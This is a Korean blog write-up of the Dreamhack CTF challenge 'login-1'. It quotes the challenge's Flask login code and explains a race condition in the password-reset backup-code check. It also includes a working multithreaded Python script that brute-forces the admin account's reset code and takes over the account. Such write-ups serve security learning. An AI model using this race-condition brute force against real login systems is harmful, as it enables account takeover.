[Dreamhack] Level 2: login-1

CTF, War game

[Dreamhack] Level 2: login-1

mnzy🌱 2024. 4. 13. 20:56

1. 문제

python으로 작성된 로그인 기능을 가진 서비스입니다. "admin" 권한을 가진 사용자로 로그인하여 플래그를 획득하세요. Reference Server-side Basic

dreamhack.io

2. 해결 과정

문제에 접속하니, 로그인/ 회원가입/비밀번호 재설정 기능이 있는 페이지가 보인다.

로그인 페이지에서 admin/admin 으로 입력해보았더니 틀렸다고 나온다.

코드 확인

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userid = request.form.get("userid")
        password = request.form.get("password")

        conn = get_db()
        cur = conn.cursor()
        user = cur.execute('SELECT * FROM user WHERE id = ? and pw = ?', (userid, hashlib.sha256(password.encode()).hexdigest() )).fetchone()
        
        if user:
            session['idx'] = user['idx']
            session['userid'] = user['id']
            session['name'] = user['name']
            session['level'] = userLevel[user['level']]
            return redirect(url_for('index'))

        return "<script>alert('Wrong id/pw');history.back(-1);</script>";

@app.route('/logout')
def logout():
    session.clear()
    return redirect(url_for('index'))

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'GET':
        return render_template('register.html')
    else:
        userid = request.form.get("userid")
        password = request.form.get("password")
        name = request.form.get("name")

        conn = get_db()
        cur = conn.cursor()
        user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
        if user:
            return "<script>alert('Already Exists userid.');history.back(-1);</script>";

        backupCode = makeBackupcode()
        sql = "INSERT INTO user(id, pw, name, level, backupCode) VALUES (?, ?, ?, ?, ?)"
        cur.execute(sql, (userid, hashlib.sha256(password.encode()).hexdigest(), name, 0, backupCode))
        conn.commit()
        return render_template("index.html", msg=f"<b>Register Success.</b><br/>Your BackupCode : {backupCode}")

@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    if request.method == 'GET':
        return render_template('forgot.html')
    else:
        userid = request.form.get("userid")
        newpassword = request.form.get("newpassword")
        backupCode = request.form.get("backupCode", type=int)

        conn = get_db()
        cur = conn.cursor()
        user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
        if user:
            # security for brute force Attack.
            time.sleep(1)

            if user['resetCount'] == MAXRESETCOUNT:
                return "<script>alert('reset Count Exceed.');history.back(-1);</script>"
            
            if user['backupCode'] == backupCode:
                newbackupCode = makeBackupcode()
                updateSQL = "UPDATE user set pw = ?, backupCode = ?, resetCount = 0 where idx = ?"
                cur.execute(updateSQL, (hashlib.sha256(newpassword.encode()).hexdigest(), newbackupCode, str(user['idx'])))
                msg = f"<b>Password Change Success.</b><br/>New BackupCode : {newbackupCode}"

            else:
                updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?"
                cur.execute(updateSQL, (str(user['idx'])))
                msg = f"Wrong BackupCode !<br/><b>Left Count : </b> {(MAXRESETCOUNT-1)-user['resetCount']}"
            
            conn.commit()
            return render_template("index.html", msg=msg)

        return "<script>alert('User Not Found.');history.back(-1);</script>";


@app.route('/user/<int:useridx>')
def users(useridx):
    conn = get_db()
    cur = conn.cursor()
    user = cur.execute('SELECT * FROM user WHERE idx = ?;', [str(useridx)]).fetchone()
    
    if user:
        return render_template('user.html', user=user)

    return "<script>alert('User Not Found.');history.back(-1);</script>";

@app.route('/admin')
def admin():
    if session and (session['level'] == userLevel[1]):
        return FLAG

    return "Only Admin !"

test/test로 회원가입을 하니 백업코드 33을 부여받았다.

코드를 보면 백업코드는 비밀번호를 변경할 때 사용된다.

또한, userLevel의 경우 1이면 admin 레벨이다.

회원가입을 하면 /user/ 뒤로 숫자가 뜨는데, /user/1 로 접속해보면 Apple/Apple 계정이 뜬다.

이때, userLevel이 1이므로 이 계정이 admin인 것을 알 수 있다.

http://host3.dreamhack.games:23385/user/2 로 접속해보면 Banana 계정이 뜬다.

이 계정은 일반 유저 계정이다.

Apple 계정 비밀번호를 바꿔서 로그인 해야 플래그를 획득해볼 수 있다.

Apple 계정 패스워드를 변경해본다.

백업코드를 모르므로 일단 0으로 설정

잘못된 백업코드라는 창이 뜨고, 로그인 시도가 4번 남았다는 카운팅이 뜬다.

패스워드 변경 코드를 다시 확인해보면,

1. user가 존재하는 계정이면 time.sleep(1)으로 1초를 지연시킨다.

2. user['resetcount']가 5이면 이전 페이지로 강제 리다이렉트 시킨다. [백업코드 실패 횟수 5회 제한]

3. backup 코드가 일치하면 1~100까지 랜덤한 숫자로 새로운 백업코드를 만들고 패스워드를 변경한다.

4. backup 코드가 일치하지 않으면 user['resetcount']를 1 증가시킨다.

레이스컨디션 개념을 떠올려보면 문제를 해결하는데 도움이 된다.

시스템 자원은 한정되어 있기 때문에 논리적인 문법이 있더라도 동시에 요청이 들어온다면 먼저 들어온 요청을 다 순차적으로 처리하는 것이 아니라 프로세스끼리 경쟁을 한다.

1~100 까지의 수들 중 랜덤으로 만들어진 수를 찾아내기는 힘들기에, , 멀티 스레드로 요청을 보내는 코드를 작성하여 1부터 100까지 시도를 해보는 방식으로 진행하였다.

import threading, requests

url = "http://host3.dreamhack.games:23385/forgot_password"

def forgot(backupCode):
    data = {"userid": "Apple", "newpassword": "Apple", "backupCode": backupCode}
    requests.post(url, data=data)
    print(f"{backupCode}번째 요청")

if __name__ == "__main__":
    threads = []
    for i in range(1, 100 + 1):
        t = threading.Thread(target=forgot, args=[i])
        t.start()
        threads.append(t)

    for thread in threads:
        thread.join()

    print("END")

이후 코드에서 수정한대로 Apple/Apple로 로그인에 성공하였다.